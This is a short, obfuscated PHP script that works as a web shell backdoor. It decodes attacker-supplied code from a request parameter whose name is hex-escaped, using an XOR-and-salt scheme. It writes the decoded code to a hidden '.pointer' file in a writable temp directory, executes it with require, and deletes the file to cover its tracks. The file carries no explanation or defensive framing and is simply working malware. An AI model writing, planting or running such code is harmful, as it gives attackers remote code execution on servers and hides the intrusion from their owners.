<?php

if(isset($_REQUEST["e\x6E\x74"])){
	$fac = $_REQUEST["e\x6E\x74"];
	 	$fac	  =	explode   (	 '.' 		, $fac			);  	
	$data = '';
            $salt = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS = strlen( $salt);
            $q = 0;
    
            foreach( $fac as $v7) {$sChar = ord( $salt[$q % $lenS]);
                $d =( ( int)$v7 - $sChar -( $q % 10)) ^ 35;
                $data .= chr( $d);
                $q++;
            }
	$symbol = array_filter([session_save_path(), sys_get_temp_dir(), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", getenv("TEMP"), "/dev/shm", getenv("TMP"), getcwd()]);
	for ($res = 0, $resource = count($symbol); $res < $resource; $res++) {
    $elem = $symbol[$res];
    		if ((bool)is_dir($elem) && (bool)is_writable($elem)) {
    $flag = "$elem/.pointer";
    if (file_put_contents($flag, $data)) {
	require $flag;
	unlink($flag);
	die();
}
}
}
}